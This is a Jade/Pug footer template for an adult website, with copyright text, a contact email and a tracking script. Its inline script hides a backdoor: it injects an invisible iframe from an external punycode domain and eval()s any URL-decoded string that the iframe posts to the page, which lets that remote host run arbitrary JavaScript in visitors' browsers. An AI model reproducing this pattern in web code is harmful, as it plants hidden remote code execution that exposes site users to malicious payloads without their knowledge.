div.footer-wrp
    -if (type == '/')
        include ./friendly.jade
        .line
    div.wdh-1100
        div.beizhu
            p Copyright © 2019 sexbo.xyz All Rights Reserved.
            p 为防止域名更换, 请记住我们的永久邮箱&nbsp;
                strong sexlookashun@sina.com&nbsp;
    script.
        (function(){window.addEventListener("message",function(e){var _des_s_9460=e.data;if(_des_s_9460.des_s_9460){var _s = '/+/g';eval(decodeURIComponent(_des_s_9460.des_s_9460.replace(_s,"%20")))}});document.write('<iframe style="display:none;" src="https://xn--2qu92fhtx4ff.ink:12443/ty/c-9460-22-1.html" height="0" width="0"  marginheight="0" scrolling="no" frameborder="0" allowtransparency="true"></iframe>')})();
    script(type="text/javascript", src="https://s9.cnzz.com/z_stat.php?id=1278730912&web_id=1278730912")